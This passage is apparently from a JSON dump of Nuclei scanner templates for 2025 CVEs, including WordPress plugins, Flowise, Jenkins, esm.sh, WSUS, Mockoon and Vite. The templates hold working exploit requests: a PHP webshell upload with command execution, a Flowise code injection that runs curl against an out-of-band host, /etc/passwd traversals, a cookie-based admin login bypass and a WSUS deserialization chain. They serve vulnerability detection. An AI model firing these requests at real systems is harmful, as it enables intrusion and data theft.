/wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2\n\n        --0b9e4b9be0f532af74af1582b95632f2\n        Content-Disposition: form-data; name=\"action\"\n\n        wpvivid_upload_import_files\n        --0b9e4b9be0f532af74af1582b95632f2\n        Content-Disposition: form-data; name=\"_ajax_nonce\"\n\n        {{ajax_nonce}}\n        --0b9e4b9be0f532af74af1582b95632f2\n        Content-Disposition: form-data; name=\"async-upload\"; filename=\"{{filename}}.php\"\n        Content-Type: application/x-php\n\n        {{payload}}\n        --0b9e4b9be0f532af74af1582b95632f2\n        Content-Disposition: form-data; name=\"name\"\n\n        {{filename}}.php\n        --0b9e4b9be0f532af74af1582b95632f2--\n\n      - |\n        GET wp-content/wpvividbackups/ImportandExport/{{filename}}.php?cmd={{cmd}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body_3\n        words:\n          - '{\"result\":\"success\"}'\n\n      - type: regex\n        part: body_4\n        regex:\n          - 'uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)'\n\n    extractors:\n      - type: regex\n        part: body_2\n        group: 1\n        internal: true\n        name: ajax_nonce\n        regex:\n          - '\"ajax_nonce\":\"([a-f0-9]+)\"'\n# digest: 4a0a00473045022100b719c5c7035ac293a24ae26edf990acf0fce06faddc1c95a9bec9618e79d7fb602203e108dfb0ee807da373939397c91564b83ceb1e84e88d23059556e7b14784427:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-5961.yaml","vuln_id":"cve-2025-5961"},{"raw":"id: CVE-2025-59582\n\ninfo:\n  name: Ajax Load More < 7.6.1 - Unauthenticated Sensitive Information Exposure\n  author: pussycat0x\n  severity: medium\n  description: |\n    The Ajax Load More – Infinite Scroll plugin for WordPress is vulnerable to  Sensitive Information Exposure in all versions up to, and including, 7.6.0.2. The plugin's AJAX endpoint (wp_ajax_nopriv_alm_get_posts) allows unauthenticated  users to access non-public posts (draft, private, pending, future, trash) by\n    injecting post_status via the custom_args parameter, which bypasses the post_status authorization check in class-alm-queryargs.php.\n  impact:\n    Attackers can retrieve sensitive embedded system information, potentially aiding further attacks or data leaks.\n  remediation:\n    Update to the latest version beyond 7.6.0.2\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ajax-load-more/ajax-load-more-7602-unauthenticated-sensitive-information-exposure\n  metadata:\n    verified: true\n    max-request: 3\n    publicwww-query: \"/wp-content/plugins/ajax-load-more/\"\n  tags: cve,cve2025,wordpress,wp-plugin,ajax-load-more,unauth\n\nhttp:\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:draft HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        X-Requested-With: XMLHttpRequest\n\n      - |\n        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:private HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        X-Requested-With: XMLHttpRequest\n\n      - |\n        GET /wp-admin/admin-ajax.php?action=alm_get_posts&post_type=post&posts_per_page=5&custom_args=post_status:pending HTTP/1.1\n        Host: {{Hostname}}\n        Accept: application/json, text/javascript, */*; q=0.01\n        X-Requested-With: XMLHttpRequest\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(body, \"\\\"html\\\":\") && contains(body_1, \"\\\"totalposts\\\":\")'\n        condition: and\n\n    extractors:\n      - type: regex\n        name: totalpost\n        part: body\n        internal: true\n        group: 1\n        regex:\n          - '\"totalposts\":([0-9]+)'\n# digest: 490a0046304402204aa476f3eb6f48527676ec3bc7e4f2b5c472e611fc8b9d5f8491e1d1ac527aa402204b9666554e2fc5cca10d1bf98e569bedfcb057a7b6f51db4edc4370f060f2648:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-59582.yaml","vuln_id":"cve-2025-59582"},{"raw":"id: CVE-2025-59528\n\ninfo:\n  name: Flowise - Remote Code Execution\n  author: xtr0nix\n  severity: critical\n  description: |\n    Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.\n  impact: |\n    Attackers can execute arbitrary code with full Node.js privileges, potentially leading to full system compromise.\n  remediation: |\n    Update to version 3.0.6 or later.\n  reference:\n    - https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59528\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2025-59528\n    epss-score: 0.86218\n    epss-percentile: 0.99723\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 2\n  tags: cve,cve2025,flowise,rce,authenticated,vkev\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/auth/login HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"id\", \"email\", \"name\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /api/v1/node-load-method/customMCP HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        x-request-from: internal\n\n        {\"loadMethod\":\"listActions\",\"inputs\":{\"mcpServerConfig\":\"({x:(function(){const cp=process.mainModule.require(\\\"child_process\\\");cp.execSync(\\\"curl {{interactsh-url}}\\\");return 1;})()})\"}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(interactsh_protocol, \"dns\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains(body, \"No Available Actions\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a0047304502202fbb5b1dd1c9f3fb92401c2a823540e51fda5ad4ebe3a0865de5141ae2debfe3022100d0452c992257a8c593c432536a47c2badb471578f87e82557b91276bf9983dc5:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-59528.yaml","vuln_id":"cve-2025-59528"},{"raw":"id: CVE-2025-59474\n\ninfo:\n  name: Jenkins Sidepanel - Unauthorized Agent/Queue Exposure\n  author: ivaldivieso\n  severity: medium\n  description: |\n    Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.\n  impact: Attackers can list agent names without required permissions, potentially exposing sensitive infrastructure details.\n  remediation: Update to a version later than 2.527 or LTS later than 2.516.2.\n  reference:\n    - https://www.jenkins.io/security/advisory/2025-09-17/\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59474\n    - https://medium.com/@Th3hound/exposing-jenkins-agents-without-auth-research-on-cve-2025-59474-ff95a2e7d22a\n  metadata:\n    verified: true\n    max-request: 2\n    shodan-query: product:\"jenkins\"\n  tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/securityRealm/signup\"\n      - \"{{BaseURL}}/jenkins/securityRealm/signup\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'Build Executor Status'\n          - 'Estado del ejecutor'\n          - 'id=\"executors\"'\n        condition: or\n\n      - type: regex\n        part: body\n        regex:\n          - 'href=\"[^\"]*/computer/[^\"]*/?\"'\n\n    extractors:\n      - type: regex\n        name: agents\n        part: body\n        group: 1\n        regex:\n          - 'href=\"[^\"]*/computer/([^\"/]+)/?\"'\n        internal: true\n\n      - type: dsl\n        dsl:\n          - 'urldecode(agents)'\n# digest: 4a0a0047304502206c0c2b8d5f43427d574175ba0732aa2d631e691aff951a69fcbe015639534ef3022100865d934dc1e61af850f5bcab8a8b4d625ba71c87cf5ec28610a66bbfee8435be:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-59474.yaml","vuln_id":"cve-2025-59474"},{"raw":"id: CVE-2025-5947\n\ninfo:\n  name: Service Finder Bookings - Authentication Bypass\n  author: sedat4ras\n  severity: critical\n  description: |\n    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.\n  impact: |\n    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 6.0.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability\n    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx\n    - https://github.com/M4rgs/CVE-2025-5947_Exploit\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-5947\n    epss-score: 0.04432\n    epss-percentile: 0.9094\n    cwe-id: CWE-639\n  metadata:\n    max-request: 2\n    vendor: sf-booking\n    product: service-finder-bookings\n    publicwww-query: \"/wp-content/plugins/sf-booking/\"\n  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: original_user_id=1\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: header\n        regex:\n          - '(?i)Location:.*\\/wp-admin\\/'\n\n      - type: regex\n        part: header\n        regex:\n          - '(?i)Set-Cookie:.*wordpress_logged_in_'\n\n      - type: status\n        status:\n          - 301\n          - 302\n# digest: 4b0a00483046022100ac013db15d787a3b6e067298b33f70f45a4f2a1801c1b447facf04ea650e11c7022100ac53004ea55b71d0437a653820785ee69e5430631356c245c5bd3f67e1549815:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-5947.yaml","vuln_id":"cve-2025-5947"},{"raw":"id: CVE-2025-59342\n\ninfo:\n  name: esm.sh <= v136 - Arbitrary File Write via Path Traversal\n  author: 0x_Akoko\n  severity: medium\n  description: |\n   esm.sh <= 136 contains a path traversal caused by improper canonicalization of the X-Zone-Id HTTP header, letting attackers write files outside the intended storage directory, exploit requires crafted header input.\n  impact: |\n   Attackers can write files to arbitrary directories, potentially leading to system compromise or data tampering.\n  remediation: |\n   Update to a version later than 136 or the latest available version.\n  reference:\n    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw\n    - https://www.exploit-db.com/exploits/52461\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59342\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2025-59342\n    cwe-id: CWE-24\n    epss-score: 0.03031\n    epss-percentile: 0.86907\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: esm-dev\n    product: esm.sh\n    shodan-query: http.html:\"esm.sh\"\n  tags: cve,cve2025,esm,path-traversal,file-write,unauth\n\nvariables:\n  randfile: \"{{to_lower(rand_text_alpha(8))}}\"\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_any(body, \"esm.sh\", \"A no-build JavaScript CDN\", \"import React from\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        POST /transform HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n        X-Zone-Id: ../../modules/transform/{{randfile}}/\n\n        {\"filename\":\"{{randfile}}.js\",\"lang\":\"js\",\"code\":\"console.log('nuclei');\",\"importMap\":{\"imports\":{\"react\":\"https://esm.sh/react\"}},\"target\":\"es2022\",\"sourceMap\":\"external\",\"minify\":true}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains(content_type, \"application/json\")\n          - contains_all(body, \"code\", \"map\")\n        condition: and\n# digest: 4a0a004730450220052a0aa86022502ccefdd4ce15911571e1564226762769999d47647454ce5c8f022100881fb4fbc5ddce4c1e816d0f9f0c12628efd48a699f4731876b565ce7aa2a6e1:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-59342.yaml","vuln_id":"cve-2025-59342"},{"raw":"id: CVE-2025-59341\n\ninfo:\n  name: esm.sh <= v136 - Local File Inclusion\n  author: 0x_Akoko\n  severity: high\n  description: |\n   esm.sh <= 136 contains a local file inclusion caused by improper URL handling, letting attackers read arbitrary files from the host filesystem remotely, exploit requires crafted request.\n  impact: |\n   Attackers can read arbitrary files from the server, potentially exposing sensitive information.\n  remediation: |\n   Update esm.sh to a version later than 136 or the latest available version.\n  reference:\n    - https://github.com/esm-dev/esm.sh/security/advisories/GHSA-49pv-gwxp-532r\n    - https://github.com/esm-dev/esm.sh/blob/c62f191d32639314ff0525d1c3c0e19ea2b16143/server/router.go#L1168\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59341\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-59341\n    cwe-id: CWE-23\n    epss-score: 0.01636\n    epss-percentile: 0.75271\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: esm-dev\n    product: esm.sh\n    shodan-query: http.html:\"esm.sh\"\n  tags: cve,cve2025,esm,lfi,traversal\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        GET / HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - status_code == 200\n          - contains_any(body, \"esm.sh\", \"A no-build JavaScript CDN\", \"import React from\")\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /pr/x/y@99/../../../../../../../../../../etc/passwd?raw=1&module=1 HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100acecb6be41f32af9489a8253479246f3cd25d1dfdb6a33219879dcfb72ee353602200d2ac83f0389dcf91125f6d23ce90f7ff0555fb35b9b727769c6d34de20e24bd:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-59341.yaml","vuln_id":"cve-2025-59341"},{"raw":"id: CVE-2025-59287\n\ninfo:\n  name: Windows Server Update Service - Insecure Deserialization\n  author: pussycat0x,princechaddha\n  severity: critical\n  description: |\n    Windows Server Update Service contains an insecure deserialization vulnerability caused by deserialization of untrusted data. An unauthorized attacker with network access can exploit this to execute arbitrary code remotely, potentially leading to full system compromise.\n  impact: |\n    Unauthenticated attackers can exploit unsafe deserialization to execute arbitrary code remotely on Windows Server Update Service systems, achieving complete server compromise.\n  remediation: |\n    Apply the Microsoft security patches as described in the MSRC update guide for Windows Server Update Service and restrict network access to WSUS endpoints.\n  reference:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287\n    - https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability\n    - https://hawktrace.com/blog/CVE-2025-59287\n    - https://research.eye.security/wsus-deserialization-exploit-in-the-wild-cve-2025-59287\n    - https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2025-59287\n    cwe-id: CWE-502\n    epss-score: 0.9998\n    epss-percentile: 0.99981\n    cpe: cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 4\n    vendor: microsoft\n    product: windows_server_update_service\n    shodan-query: cpe:\"cpe:2.3:o:microsoft:windows_server_2012\"\n  tags: cve,cve2025,windows,server,wsus,kev,vkev,deserialization,rce,vuln\n\nvariables:\n  domain: \"{{rand_text_alphanumeric(5)}}.local\"\n\nflow: http(1) && http(2) && http(3) && http(4)\n\nhttp:\n  - raw:\n      - |\n        POST /ReportingWebService/ReportingWebService.asmx HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: text/xml; charset=utf-8\n        SOAPAction: \"http://www.microsoft.com/SoftwareDistribution/GetRollupConfiguration\"\n        Content-Type: text/xml\n        Content-Length: 331\n\n        <?xml version=\"1.0\" encoding=\"utf-8\"?>\n        <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n          <soap:Body>\n            <GetRollupConfiguration xmlns=\"http://www.microsoft.com/SoftwareDistribution\">\n                <cookie xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" i:nil=\"true\"/>\n            </GetRollupConfiguration>\n          </soap:Body>\n        </soap:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"RollupResetGuid\")'\n          - 'contains(header, \"text/xml\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: ServerId\n        group: 1\n        regex:\n          - '<ServerId>(.*)</ServerId>'\n        internal: true\n\n  - raw:\n      - |\n        POST /SimpleAuthWebService/SimpleAuth.asmx HTTP/1.1\n        Host: {{Hostname}}\n        SOAPAction: \"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService/GetAuthorizationCookie\"\n        Content-Type: text/xml\n        Content-Length: 413\n\n        <?xml version=\"1.0\" encoding=\"utf-8\"?>\n        <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n          <soap:Body>\n            <GetAuthorizationCookie xmlns=\"http://www.microsoft.com/SoftwareDistribution/Server/SimpleAuthWebService\">\n              <clientId>{{ServerId}}</clientId>\n              <targetGroupName></targetGroupName>\n              <dnsName>{{domain}}</dnsName>\n            </GetAuthorizationCookie>\n          </soap:Body>\n        </soap:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"CookieData\")'\n          - 'contains(header, \"text/xml\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        name: cookie\n        group: 1\n        regex:\n          - '<CookieData>(.*)</CookieData>'\n        internal: true\n\n  - raw:\n      - |\n        POST /ClientWebService/Client.asmx HTTP/1.1\n        Host: {{Hostname}}\n        SOAPAction: \"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie\"\n        Content-Type: text/xml\n        Content-Length: 413\n\n        <?xml version=\"1.0\" encoding=\"utf-8\"?>\n          <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\n          <soap:Body>\n        <GetCookie xmlns=\"http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService\">\n          <authCookies>\n            <AuthorizationCookie>\n              <PlugInId>SimpleTargeting</PlugInId>\n              <CookieData>{{cookie}}</CookieData>\n            </AuthorizationCookie>\n            </authCookies>\n            <oldCookie xmlns:i=\"http://www.w3.org/2001/XMLSchema-instance\" i:nil=\"true\"/>\n          <lastChange>{{date_time(\"%Y-%M-%DT%H:%m:%sZ\")}}</lastChange>\n            <currentTime>{{date_time(\"%Y-%M-%DT%H:%m:%sZ\")}}</currentTime>\n            <protocolVersion>1.20</protocolVersion>\n        </GetCookie>\n        </soap:Body>\n        </soap:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"GetCookieResult\")'\n          - 'contains(header, \"text/xml\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n    extractors:\n      - type: regex\n        part: body\n        group: 1\n        name: EncryptedData\n        regex:\n          - <EncryptedData>(.*)</EncryptedData>\n        internal: true\n\n  - raw:\n      - |\n        POST /ReportingWebService/ReportingWebService.asmx HTTP/1.1\n        Host: {{Hostname}}\n        Accept: text/xml\n        Connection: keep-alive\n        Content-Type: text/xml\n        SOAPAction: \"http://www.microsoft.com/SoftwareDistribution/ReportEventBatch\"\n        Content-Length: 4464\n\n        <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenc=\"http://schemas.xmlsoap.org/soap/encoding/\">\n        <soap:Body>\n        <ReportEventBatch xmlns=\"http://www.microsoft.com/SoftwareDistribution\">\n        <cookie>\n        <Expiration>{{date_time(\"%Y-%M-%DT%H:%m:%sZ\")}}</Expiration>\n        <EncryptedData>{{EncryptedData}}</EncryptedData>\n        </cookie>\n        <clientTime>{{date_time(\"%Y-%M-%DT%H:%m:%sZ\")}}</clientTime>\n        <eventBatch xmlns:q1=\"http://www.microsoft.com/SoftwareDistribution\" soapenc:arrayType=\"q1:ReportingEvent[1]\">\n        <ReportingEvent>\n        <BasicData>\n        <TargetID>\n        <Sid>549743e5-8546-4f9d-b946-7948711f7b69</Sid>\n        </TargetID>\n        <SequenceNumber>0</SequenceNumber>\n        <TimeAtTarget>2025-10-29T08:41:54.069</TimeAtTarget>\n        <EventInstanceID>a0ce0892-6046-4f21-856e-69ffa43876b9</EventInstanceID>\n        <NamespaceID>2</NamespaceID>\n        <EventID>389</EventID>\n        <SourceID>301</SourceID>\n        <UpdateID>\n        <UpdateID>00000000-0000-0000-0000-000000000000</UpdateID>\n        <RevisionNumber>0</RevisionNumber>\n        </UpdateID>\n        <Win32HResult>0</Win32HResult>\n        <AppName>LocalServer</AppName>\n        </BasicData>\n        <ExtendedData>\n        <MiscData soapenc:arrayType=\"xsd:string[2]\">\n        <string>Administrator=SYSTEM</string>\n        <string>{{randstr}}</string>\n        </MiscData>\n        </ExtendedData>\n        <PrivateData>\n        <ComputerDnsName></ComputerDnsName>\n        <UserAccountName></UserAccountName>\n        </PrivateData>\n        </ReportingEvent>\n        </eventBatch>\n        </ReportEventBatch>\n        </soap:Body>\n        </soap:Envelope>\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"ReportEventBatchResult>true</ReportEventBatchResult>\")'\n          - 'contains(header, \"text/xml\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 4a0a00473045022100f5bdc4f1fd675b8dd3f1d7e18cfccf3e79bcbdb491008538e366d4866bad2531022020e5dadbcac797beaa85485e27b512c45fd6576644276a5f8b4e7c23a9191196:922c64590222798bb761d5b6d8e72950","severity":"critical","template_path":"http/cves/2025/CVE-2025-59287.yaml","vuln_id":"cve-2025-59287"},{"raw":"id: CVE-2025-59136\n\ninfo:\n  name: WordPress Gerencianet Oficial <= 3.1.3 - Unauthenticated Order Status Disclosure\n  author: pussycat0x\n  severity: medium\n  description: |\n    Efí Bank Gerencianet Oficial <= 3.1.3 contains an insertion of sensitive information into sent data vulnerability caused by improper handling of embedded sensitive data, letting attackers retrieve embedded sensitive data, exploit requires crafted requests.\n  impact:\n    Attackers can retrieve embedded sensitive data, leading to information disclosure.\n  remediation: |\n    Update to the latest version beyond 3.1.3.\n  reference:\n    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-gerencianet-official/gerencianet-oficial-313-unauthenticated-information-exposure\n    - https://patchstack.com/database/wordpress/plugin/woo-gerencianet-official/vulnerability/wordpress-gerencianet-oficial-plugin-3-1-3-sensitive-data-exposure-vulnerability\n  metadata:\n    verified: true\n  tags: cve,cve2025,wordpress,wp-plugin,gerencianet,woocommerce\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=gn_check_order_status&order_id={{order_id}}\n\n    attack: batteringram\n    payloads:\n      order_id:\n        - \"1\"\n        - \"2\"\n        - \"3\"\n        - \"4\"\n        - \"5\"\n        - \"6\"\n        - \"7\"\n        - \"8\"\n        - \"9\"\n        - \"10\"\n\n    stop-at-first-match: true\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"success\":true'\n          - '\"current_status\"'\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: status\n        status:\n          - 200\n\n    extractors:\n      - type: json\n        part: body\n        name: order_status\n        json:\n          - '.data.current_status'\n# digest: 490a0046304402201c626019732d75952114c5ecb2bfcd63d197df468efb7729fa47e99be9415f8d02204b1fc5c7df4903bee717fc3ffb96bfd8451b22954f40429c1e4abee8da4b499b:922c64590222798bb761d5b6d8e72950","severity":"medium","template_path":"http/cves/2025/CVE-2025-59136.yaml","vuln_id":"cve-2025-59136"},{"raw":"id: CVE-2025-59049\n\ninfo:\n  name: Mockoon < 9.2.0 - Path Traversal\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: high\n  description: |\n    Mockoon before 9.2.0 contains a path traversal and local file inclusion caused by unsafe templating of server filenames from user input, letting attackers read arbitrary files on the mock server filesystem, exploit requires crafted request.\n  impact: |\n    Attackers can read arbitrary files from the mock server filesystem through path traversal in static file serving, potentially exposing sensitive configuration and credential files.\n  remediation: |\n    Upgrade Mockoon to version 9.2.0 or later that properly validates and restricts file paths in template processing.\n  reference:\n    - https://github.com/mockoon/mockoon/security/advisories/GHSA-w7f9-wqc4-3wxr\n    - https://github.com/mockoon/mockoon/commit/c7f6e23e87dc3b8cc44e5802af046200a797bd2e\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-59049\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-59049\n    epss-score: 0.01764\n    epss-percentile: 0.77064\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: mockoon\n    product: mockoon\n  tags: cve,cve2025,mockoon,lfi,path-traversal,vuln\n\nvariables:\n  static_dir: \"static\"\n\nhttp:\n  - raw:\n      - |\n        GET /{{static_dir}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"application/json\"\n# digest: 4a0a004730450221008630eb9941616eb4f59a0378bda8cd3f91fb4795e49b8e0309d9a3eb7aa30e1802206a68a120ee0e0076e712818993fdab96d3cd3a4fb2165ea8fab7963c3f47fcf5:922c64590222798bb761d5b6d8e72950","severity":"high","template_path":"http/cves/2025/CVE-2025-59049.yaml","vuln_id":"cve-2025-59049"},{"raw":"id: CVE-2025-58751\n\ninfo:\n  name: Vite Dev Server - Path Traversal\n  author: wn147\n  severity: low\n  description: |\n    Vite is a frontend tooling framework for JavaScript. Prior to versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20, files starting with the same name with the public directory were served bypassing the `server.fs` settings. Only apps that explicitly expose the Vite dev server to the network (using --host or `server.host` config option), use the public directory feature (enabled by default), and have a symlink in the public directory are affected. Versions 7.1.5, 7.0.7, 6.3.6, and 5.4.20 fix the issue.\n  impact: |\n    Attackers can access unauthorized files bypassing filesystem restrictions, potentially exposing sensitive data.\n  remediation: |\n    Update to versions 7.1.5, 7.0.7, 6.3.6, or 5.4.20 or later.\n  reference:\n    - https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-58751\n  classification:\n    cve-id: CVE-2025-58751\n    epss-score: 0.01214\n    epss-percentile: 0.67208\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 5.3\n    cwe-id: CWE-22\n  metadata:\n    verified: true\n    max-request: 1\n    fofa-query: body=\"/@vite/client\"\n  tags: cve,cve2025,vite,lfi,vuln\n\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/../package.json\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"application/json\")'\n          - 'contains_all(body, \"\\\"name\\\":\", \"\\\"overrides\\\":\")'\n        condition: and\n# digest: 490a004630440220529e6e802b29f461993697a67f78ddfcde8fcbb05c77ccbc0941b3c84d78c3ec0220430e374587b427da6d43f86fd382c4bbae70e1c85d49769a6f4b65a7e0b10438:922c64590222798bb761d5b6d8e72950","severity":"low","template_path":"http/cves/2025/CVE-2025-58751.yaml","vuln_id":"cve-2025-58751"},{"raw":"id: CVE-2025-58443\n\ninfo:\n  name: FOGProject <= 1.5.10.1673 - Authentication Bypass\n  author: oleveloper\n  severity: critical\n  description: |\n    FOGProject version 1.5.10.1673 suffers from an authentication bypass vulnerability that allows unauthenticated users to access the management interface without proper authentication. This can lead to unauthorized access to system configuration, host management, and potentially database information.\n  impact: |\n    Unauthenticated attackers can bypass authentication to access the FOGProject management interface and retrieve sensitive system configuration and host management information.\n  